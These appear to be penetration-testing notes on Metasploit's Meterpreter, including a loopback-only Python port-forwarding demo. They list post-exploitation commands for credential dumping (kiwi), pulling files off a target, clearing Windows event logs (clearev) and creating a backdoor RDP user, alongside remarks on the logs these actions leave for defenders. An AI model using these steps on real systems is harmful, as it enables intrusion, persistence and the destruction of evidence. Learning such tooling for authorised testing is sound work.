
meterpreter

help # shows help
background # puts the current session in the background; from msfconsole we can
# list backgrounded sessions with "sessions -l" and re-enter one with
# "sessions -i <id>"

Once we get a session on a machine, we generally start with these commands to orient ourselves:

getuid # which user (and therefore which privilege level) the session runs as on the remote machine
sysinfo # provides info on the target system (OS, architecture, hostname)
ps # shows the list of active processes on the target machine
shell # drops to a system shell (cmd.exe or /bin/sh, depending on the target)

Once in the system shell, we can go back to our meterpreter session by issuing:

exit

We can manage (e.g., download/upload) files with:

download remote_file [local_path] # copies a file from the target to our machine
upload local_file [remote_path] # copies a file from our machine to the target
search -f filename # searches the target filesystem; -d <dir> restricts the search to a directory

From the meterpreter session we can load additional extensions (e.g., kiwi for credential dumping) with:

load <extension> # press tab to list the available extensions

We can also run scripts and post modules that are generally used in the post-exploitation phase, such as:

run # double tab to list all available scripts and post modules
run post/linux/gather/checkvm # checks whether the target machine is a VM

Notice that these post modules can also be run from msfconsole rather than from inside meterpreter: background the session, select the module with "use post/...", set its SESSION option to the session id and run it.

On Windows targets we can also clear the event logs (Application, System and Security) with:

clearev
# note that this is itself a loud action: Windows records the clearing of the
# Security log as event ID 1102 (and of the System log as 104), which defenders
# commonly alert on

Another useful option on Windows targets is to enable RDP on the compromised machine and create a new local user for ourselves. The classic way is the getgui meterpreter script, where -u takes a username (not a numeric UID) and -p the password:

run getgui -u <username> -p <password>
# getgui is deprecated in current Metasploit releases; the equivalent is the
# post/windows/manage/enable_rdp module with its USERNAME and PASSWORD options
# (set ENABLE to true). Creating a local account is logged in the Security log
# (event ID 4720), so this is not a stealthy option.

Meterpreter Port Forwarding

We can perform port forwarding through a meterpreter session much as we would with SSH tunnels (ssh -L). For example, suppose a service is listening on the compromised machine (or on another host it can reach) but is not reachable from our machine; we can forward it to a custom port on our localhost with:

portfwd add -l 1234 -p 25 -r 192.168.1.99
# this makes our local port 1234 a mirror of port 25 on the target
# 192.168.1.99 (-l local port, -p remote port, -r remote host)
# notice that now we may run exploits against our localhost, e.g.:
# ./super_remote_mail_exploit --target 127.0.0.1:1234
# this will attack the victim's port 25 through the meterpreter session
# portfwd list shows the active forwards, portfwd delete -l 1234 removes one
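To make concrete what a forward like the one above actually does on the wire, here is an added example (not Meterpreter's own code, and not from the original notes): a small TCP relay in plain Python that binds a local port and pipes every connection to a remote host:port, which is the same mechanism portfwd implements over the session channel. The "victim" service, its banner, and the ports are all constructed inline for the demo, so it runs offline on loopback; in a real engagement the remote side would be the pivot target such as 192.168.1.99:25.

```python
import socket
import threading

BUFSIZE = 4096


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(BUFSIZE)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForward:
    """Relay 127.0.0.1:local_port -> remote_host:remote_port.

    This is the mechanism behind `portfwd add -l <local_port> -p <remote_port>
    -r <remote_host>`: a listener on our side, and one upstream connection
    per accepted client with bytes copied in both directions.
    local_port=0 lets the OS pick a free port (read it from .local_port).
    """

    def __init__(self, local_port, remote_host, remote_port):
        self.remote = (remote_host, remote_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # bind to loopback only: the forward is for us, not for the whole LAN
        self.listener.bind(("127.0.0.1", local_port))
        self.listener.listen(16)
        self.local_port = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return  # listener closed by stop()
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client):
        try:
            upstream = socket.create_connection(self.remote, timeout=5)
        except OSError:
            client.close()  # remote side unreachable: drop the client
            return
        upstream.settimeout(None)
        t = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
        t.start()
        _pump(upstream, client)
        t.join()
        client.close()
        upstream.close()

    def stop(self):
        self.listener.close()


def start_fake_service(banner=b"220 victim ESMTP\r\n"):
    """Constructed stand-in for the victim's mail service: greets, answers one line, closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        line = conn.recv(BUFSIZE)
        conn.sendall(b"250 " + line.strip() + b"\r\n")
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Bring up the fake service, forward it, and talk to it via the local port only."""
    victim_port = start_fake_service()
    fwd = PortForward(0, "127.0.0.1", victim_port)  # like: portfwd add -l 0 -p 25 -r victim
    with socket.create_connection(("127.0.0.1", fwd.local_port), timeout=5) as s:
        banner = s.recv(BUFSIZE)          # the victim's greeting, relayed to us
        s.sendall(b"EHLO attacker\r\n")   # what an exploit aimed at 127.0.0.1:<port> would send
        reply = s.recv(BUFSIZE)
    fwd.stop()
    return banner, reply


if __name__ == "__main__":
    print(demo())
```

The relay copies bytes blindly, so anything the tool on our side sends reaches the victim port unchanged, which is exactly why exploits can be pointed at 127.0.0.1:1234 as in the notes. Meterpreter additionally carries the upstream leg inside the encrypted session instead of opening a direct socket from our host, so the forwarded traffic appears to originate from the compromised machine.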